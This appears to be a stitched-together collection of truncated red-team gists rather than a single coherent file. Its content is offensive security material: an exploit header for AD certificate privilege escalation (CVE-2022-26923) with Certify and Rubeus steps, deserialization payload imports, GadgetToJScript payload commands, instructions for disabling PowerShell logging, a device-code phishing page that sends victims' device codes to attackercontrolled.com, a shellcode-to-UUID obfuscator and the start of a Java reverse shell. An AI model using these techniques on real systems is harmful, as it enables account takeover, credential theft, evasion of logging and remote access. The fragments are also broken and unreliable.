// Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923) | |
// Author: @domchell - MDSec | |
// This exploit can be used to update the relevant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account | |
// Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :) | |
// Steps: | |
// 1. Escalate on any workstation (hint: krbrelayup ftw) | |
// 2. Execute UpdateMachineAccount.exe as SYSTEM | |
// 3. Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp | |
// 4. Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256) |
function Get-DirectoryContent { | |
<# | |
.SYNOPSIS | |
Function to get directory content | |
.EXAMPLE | |
Get-DirectoryContent -Path "C:\" -HeaderName "poshserver.net" -RequestURL "http://poshserver.net" -SubfolderName "/" | |
//All credit goes to Ysoserial.net and the great @tiraniddo | |
//Snippets copied from ysoserial.net | |
//https://thewover.github.io/Mixed-Assemblies/ - Great read! | |
//https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui - Another great read | |
using System; | |
using System.Collections.Generic; | |
using System.Runtime.Serialization.Formatters.Binary; | |
using System.IO; | |
using System.Reflection; |
Logs are held by default in the user profile: | |
\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt | |
This directory also hosts per-application logs. | |
-------------------------------------------------------------- | |
Disable Logging... | |
remove-module psreadline |
import smtplib | |
from email.mime.text import MIMEText | |
from email.mime.multipart import MIMEMultipart | |
from email.mime.text import MIMEText | |
from email.mime.base import MIMEBase | |
from email import encoders | |
import ssl | |
import email | |
import argparse |
# Command to generate HTA code using GadgetsToJScript | |
GadgetToJScript.exe -w hta | |
# Command to generate JS code using GadgetsToJScript | |
GadgetToJScript.exe -w js | |
# Command to generate VBS code using GadgetsToJScript | |
GadgetToJScript.exe -w vbs | |
# Command to generate VBA code using GadgetsToJScript |
# Upload | |
&{ | |
$ErrorActionPreference = 'Stop' | |
$AWSRegion = "us-east-1" | |
$AWSAccessKeyId = "TODO: Access Key" | |
$AWSSecretAccessKey = "TODO: Secret Access Key" | |
$BucketName = "TODO: Bucket Name" | |
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") | Out-Null | |
$OpenFileDialog = New-Object System.Windows.Forms.OpenFileDialog | |
$OpenFileDialog.ShowDialog() | Out-Null |
<!-- This page can be formatted to look like something more interesting --> | |
<!-- NOTE(review): jQuery is fetched from a third-party CDN with no integrity/crossorigin attribute, and the device-code request below is relayed through cors-anywhere.herokuapp.com; both are external dependencies the page trusts blindly. -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> | |
<script> | |
// Starts an OAuth 2.0 device-code flow against login.microsoftonline.com via the CORS proxy,
// then (next line) forwards the returned device_code to a non-Microsoft host before showing
// the user the standard "go to ... and enter code" message. From a defender's view, the
// cross-origin GET carrying device_code to attackercontrolled.com is the observable step.
$.get("https://cors-anywhere.herokuapp.com/https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0&client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&resource=https://graph.windows.net").done(function(data) { | |
$.get("https://attackercontrolled.com/?id=" + data.device_code); | |
document.write(data.message); | |
}); | |
</script>
from uuid import UUID | |
import os | |
import sys | |
# Usage: python3 binToUUIDs.py shellcode.bin [--print] | |
print(""" | |
____ _ _______ _ _ _ _ _____ _____ | |
| _ \(_) |__ __| | | | | | | |_ _| __ \ | |
| |_) |_ _ __ | | ___ | | | | | | | | | | | | |___ |
// Not sure where I originally got this from. | |
import java.io.IOException; | |
import java.io.InputStream; | |
import java.io.OutputStream; | |
import java.net.Socket; | |
public class C { | |
public C() throws Exception { | |
String host="10.0.0.90"; |